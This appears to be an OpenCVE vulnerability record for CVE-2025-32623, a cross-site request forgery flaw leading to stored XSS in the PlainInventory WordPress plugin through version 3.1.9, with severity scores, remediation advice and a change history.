Description
Cross-Site Request Forgery (CSRF) vulnerability in plainware PlainInventory z-inventory-manager allows Stored XSS.This issue affects PlainInventory: from n/a through <= 3.1.9.
Published: 2025-04-09
Score: 7.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A Cross‑Site Request Forgery flaw in the PlainInventory WordPress plugin allows an attacker to submit a forged request that stores malicious script code in the system. The stored script is later executed in the browser context of any user who views the affected page.

Affected Systems

The vulnerability is present in Plainware’s PlainInventory plugin for WordPress, affecting all releases up to and including version 3.1.9. Users and site administrators running these versions should verify their installation and consider upgrading to a patched release if available.

Risk and Exploitability

The CVSS score of 7.1 indicates high severity, while the EPSS score of less than 1% suggests a low likelihood of exploitation at this time. The flaw is not listed in the CISA KEV catalog. Attackers typically exploit the CSRF weakness by getting an authenticated user to visit a crafted URL or by embedding the request in a malicious site, after which the injected script can persist and affect all subsequent users who view the stored content.

Generated by OpenCVE AI on May 1, 2026 at 10:56 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade PlainInventory to the latest version that removes the CSRF flaw (e.g., 3.2.0 or newer).
  • If an upgrade is not immediately possible, disable or remove the plugin from the site to eliminate the attack surface while a patch is applied.
  • Conduct a database audit to identify and delete any stored scripts that were injected via the vulnerability, and ensure that user‑submitted content is properly sanitized.

Generated by OpenCVE AI on May 1, 2026 at 10:56 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-10580 Cross-Site Request Forgery (CSRF) vulnerability in plainware PlainInventory allows Stored XSS. This issue affects PlainInventory: from n/a through 3.1.9.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description Cross-Site Request Forgery (CSRF) vulnerability in plainware PlainInventory allows Stored XSS. This issue affects PlainInventory: from n/a through 3.1.9. Cross-Site Request Forgery (CSRF) vulnerability in plainware PlainInventory z-inventory-manager allows Stored XSS.This issue affects PlainInventory: from n/a through <= 3.1.9.
References
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Wed, 09 Apr 2025 16:30:00 +0000

Type Values Removed Values Added
Description Cross-Site Request Forgery (CSRF) vulnerability in plainware PlainInventory allows Stored XSS. This issue affects PlainInventory: from n/a through 3.1.9.
Title WordPress PlainInventory plugin <= 3.1.9 - CSRF to Stored XSS vulnerability
Weaknesses CWE-352
References
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:12:25.731Z

Reserved: 2025-04-09T11:20:43.115Z

Link: CVE-2025-32623

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Deferred

Published: 2025-04-09T17:15:49.000

Modified: 2026-06-17T09:12:19.020

Link: CVE-2025-32623

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-01T11:00:15Z

Weaknesses
  • CWE-352

    Cross-Site Request Forgery (CSRF)